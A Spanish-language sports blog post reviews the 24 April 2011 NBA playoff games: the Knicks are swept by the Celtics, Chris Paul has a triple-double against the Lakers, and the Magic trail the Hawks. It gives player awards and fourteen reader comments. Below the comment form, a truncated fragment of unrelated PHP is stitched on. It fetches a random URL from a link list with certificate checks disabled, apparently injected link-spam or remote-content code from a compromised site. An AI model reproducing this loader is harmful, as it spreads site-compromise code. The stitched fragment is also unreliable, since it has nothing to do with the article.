Playoffs (24/04/2011): Los Knicks barridos.

25 de April de 2011 por TheDeerHunter

Teníamos dudas sobre si abrir hoy con esta serie. Tal y como se estaba desarrollando no había muchas esperanzas de que se alargara. Al final no reapareció Shaq y, por contra, Stoudemire salió y cumplió. También Melo puso lo suyo para evitar las vacaciones, pero de donde no hay no se puede sacar y el mejor del resto fue Anthony Carter. Con eso se dice todo. Por los Celtics gran partido de Garnett y también de Rondo con un buen Glen Davis saliendo desde el banquillo. No hizo falta una gran versión de Pierce ni de Allen. Todo demasiado cómodo (101-89). Una pena para una serie tan fantástica como esta sobre el papel.

Si acaso es más noticioso lo cuesta arriba que se les ha puesto su eliminatoria a los Magic. Zaza y Richardson vieron el partido desde la grada al estar sancionados por su pelea en el anterior encuentro. Jamal Crawford ejerció de nuevo de ejecutor, anoche contra la mejor versión de Gilbert Arenas desde que aterrizó en Orlando. Sin Pachulia delante Howard hizo lo que le vino en gana, pero aún así no fue suficiente. La actuación de Turkoglu (2-12), Nelson (3-12), Redick (0-6) y Anderson (1-6) es toda una sentencia de muerte. 3-1 para los Hawks (85-88).

Tampoco les va excesivamente bien a los Lakers. Ayer Chris Paul les dejó a ellos y a nosotros con la boca abierta. Un must see, actuación mítica o como lo queráis llamar. Triple doble maravilloso sin respuesta por parte de los campeones. Actuación floja de Odom y de Bynum, que han sido el termómetro de estos Lakers en la serie. Pau y Kobe siguen transmitiendo unas sensaciones muy extrañas, sin haberlo hecho especialmente mal anoche. Si los Hornets ganan el rebote ganan la serie. Es algo que no se le hubiera pasado por la cabeza a nadie hasta este momento. Y cuidado porque Kobe salió en muletas (88-93).

Finalmente, los Sixers lograron evitar el 4-0. Actuación floja de Bosh, malas decisiones postreras y dos triples milagrosos de Holiday y Williams lograron la machada. Han decepcionado en la postemporada y no son rival para Miami, pero es justo al menos que se lleven una victoria como premio a una bonita campaña. La sensación que queda es que aquí ya han hecho todo lo que tenían que hacer. El próximo partido se acaba esto.

PREMIOS

MVP: Chris Paul rompe todos los registros y nos regala una de las mejores actuaciones individuales de la historia de los playoffs. 27 puntos, 15 asistencias y 13 rebotes del mejor base de la NBA. ¿Alguien dudó en algún momento?

Sorpresa: Louis Williams se marcó 17 puntos, 3 de los cuales en 1 triple con su equipo 1 abajo afalta de 8 segundos. Enseñó a los Heat lo que significa “Clutch Time”. Destacar también los 20 puntos de Gilbert Arenas, el único jugador de los Magic que acompañó a Howard anoche.

Decepción: Los Knicks barridos y los Magic a un paso de ser eliminados. Lo de Orlando es normal si no eres capaz de anotar más de 2 triples de 23 intentos. Turkoglu, Nelson, Redick y Anderson se cubrieron de gloria en este aspecto.

Esfuerzo en vano: Lebron James fue fiel a sí mismo cujando una de sus clásicas actuaciones. 31 puntos, 7 rebotes y 6 asistencias que fueron en balde debido al poco acierto de los Heat en los segundos finales.

Comenta

14 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Ayer vi el Orlando-Atlanta, y aun no se que hizo Turkoglu en la última jugada, tal y como estaba Arenas no se como no le dieron a el la bola para que se jugara el triple.

      Citar

  2. Vader dice:
    #2

    Que lastima que no se ganaran ninguno de los dos partidos em Boston. En el Madison las lesiones, la presion y lo corta que es la plantilla a dictado sentencia. Boston es un equipazo, demasiado hueso para los Knicks de este año. A ver que equipo se hace si no hay lockout, se ira a por CP3? M.Gasol? D.Howard? Veremos pero miedo me dan los Knicks cuando hablamos de decisiones de despacho. A ver si se sabe aprovechar el haber reunido a Amar’e y Melo.

    Les deseo mucha suerte a Boston, mi preferido en el Este una vez eliminados los Knicks.

    Saludos

      Citar

  3. Txusma dice:
    #3

    Que Orlando vaya por detrás en la eliminatoria es para hacérselo mirar. A excepción de Howard, todo el equipo está para tirarlo a los leones y aún así pierden los partidos en los últimos segundos. Con un poco más de acierto desde la línea de 3 el resultado sería muy diferente.

      Citar

  4. Len Bias dice:
    #4

    Quién iba a decir que los Knicks serían barridos, siendo que estuvieron a punto de ganar los dos primeros partidos en el TD Garden

      Citar

  5. Hynreck dice:
    #5

    En NY el equipo tampoco da para más. Stat ha estado flojo toda la eliminatoria y Carmelo bastante revolucioado. El resto sencillamente no existen. Podrían rellenar el equipo con jugadores LEB que la influencia sería la misma.

    La sorpresa hoy se la daría a Evan Turner, muy buen partido teniendo en cuenta la desastrosa temporada que se ha cascado. Dicho esto, sólo añadir: LOUUUUUUUUUUU!

      Citar

  6. max dice:
    #6

    Stat hoy se ha marcado un 5/20 bastante lamentable. Ya sé que juega medio lesionado pero aún y así….
    Miami continua dándole el último balón a Lebron y éste continua fallando. Supongo que algún día meterá alguno pero por si acaso yo dejaría que se la jugara alguna vez Wade.

      Citar

  7. JHC dice:
    #7

    3 – 1 para mis Hawks weeee tenia confianza en que ibamos a pasar pero no con tanta facilidad pese a los ajustados marcadores creo k acabara 4 – 2 para los hawks que estan sabiendo dejar hacer a Howard pero parando la anotacion del resto del equipo ayer incluso les superó en rebotes… ya pensar en vencer a Chicago son palabras mayores pero no creo k nos llevemos un 4-0 como en anteriores camapañas se vera hay el verdadero potencial de chicago

      Citar

  8. Antoine Doinel dice:
    #8

    Bueno, 4-0 y para casa. Cuando se pusieron a 4 puntos temí por la victoria, pero un par de aciertos de Allen y Garnett y los Knicks se diluyeron.
    Sorprendido estoy por Orlando, me esperaba que mostrarían un nivel más alto. Miami lo tiene hecho en el próximo pero está bien que descansen un poquito menos que los Celtics.

    Y los Lakers… ay, los Lakers. Como se confíen puede haber sorpresa. No lo creo pero…

      Citar

  9. HisRoyalAirness dice:
    #9

    El ùltimo balón de los Heat debe ser siempre para Wade, no sé a que coño juega Spoelstra quitándole los galones de esa maneras.
    CP3 no deja de hacerle un traje tras otro a Fischer, los Lakers tienen que hacérselo mirar.

    y yo si fuese el GM de Knicks intentaría deshacerme de Stoudamire en un trade po Howard o Paul. Melo y él no pegan ni con cola

      Citar

  10. Viva_Dirk dice:
    #10

    El último problema que estan teniendo los Lakers en esta serie es Fisher, espero sinceramente 2 victorias contundentes para acabar 4-2, porque un 7º partido ya en primera ronda es una pésima noticia.

      Citar

  11. HisRoyalAirness dice:
    #11

    Dirk yo no digo que sea el único, ojo, pero es que su par es el que hace y deshace a su antojo durante todo el prtido. Sé que Fish tiene voluntad y huevos y en ataque está cumpliendo pero CP3 le supera de una manera abismal.
    Evidentemente es un sinsentido que tus dos all-star bicampeones que en RS promediaban 18-10 y 25-4 estén haciendo estos números vergonzosos (para su caché) y ese es un lastre que están pagando. Pero la defensa del jugador estrella del rival es tan importante como que los tuyos produzcan y eso no lo están haciendo. Paul ayer produjo directamente cerca de 50 puntos

      Citar

  12. Viva_Dirk dice:
    #12

    De ese tipo de situaciones siempre se ha encargado Kobe, siempre que el base rival ha sido un problema ha sido Kobe el que lo ha marcado para bajar su producción y así debe ser si queremos ponerselo mas dificil a Paul.

      Citar

  13. TheDeerHunter dice:
    #13

    Yo tengo la teoría de que pocos defensores excelsos podrían para a CP3 en esta serie.
    Fisher sufre… pero no siempre se encarga él de su defensa. También está sufriendo Kobe que es uno de los mejores defensores de perímetro de toda la liga.

    Coincido con Viva. Fisher es el menor de los problemas que tienen los amarillos ahora mismo. Está cumpliendo como siempre… pero nadie puede exigirle que gane la eliminatoria él.

      Citar

  14. GreenPride dice:
    #14

    De vuelta de las vacaciones he visto los 4 partidos de ayer para irme poniendo a tono en los playoffs. Por orden.
    Para empezar los Heat se dejan un partido que tenían ganado. Nada preocupante en las series que ganarán casi con seguridad en el 5º pero un toque de atención al perder otro partido igualado con LeBron fallando tiros decisivos. Veremos que les depara su primera serie de “verdad” con los Celtics.
    Estos por su parte no dieron opción a los mermados Knicks. Sin Billups y con Stat tocado fueron machacados la mayor parte del partido y sólo una última reacción de orgullo les acercó antes de caer. Demasiado poco equipo para intentar inquietar a un equipo tan experto como los Celtics. En estos, bien Jermaine en defensa y el Big Four en el ataque en la mayor parte de la serie. Tras el calentamiento viene lo gordo contra los Heat donde saldremos de dudas sobre los 2 equipos. ¿Servirá la semana de descanso para recuperar a Shaq? Pregunta importante para las semis de conferencia.
    Por su parte Orlando no puede ganar con Anderson, Nelson, Turkoglu, Reddick y compañia tan nefastos. ¿Por qué le dan el triple para empatar a un Turkoglu que estaba siendo posiblemente su peor jugador en ataque del partido? No creo que los Hawks tengan mucho que hacer en la siguiente ronda aunque tampoco doy por totalmente perdida la serie para los Magic, pase quien pase lo veo difícil para ellos contra los Bulls.
    Y así llego al partido de los Lakers. Vaya por delante que los Lakers sufren contra todos los equipos con buenos bases (todos no solo CP3) y también que ayer hubiese sido difícil parar a Paul pero es que el resto no son tampoco gran cosa y la empanada de los Lakers a veces parece monumental. Con Pau regular y Kobe nada fino en estos playoffs (ya veremos además si tocado en el tobillo ahora) los Lakers tendrán que mejorar mucho para aspirar a ganar el anillo. Lo bueno es que aún así veo poquísimas opciones de que los Hornets puedan ganar las series ya que no siempre CP3 podrá jugar a ese nivel ni Ariza las meterá todas en la primera parte pero los Lakers deben mejorar y mucho.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>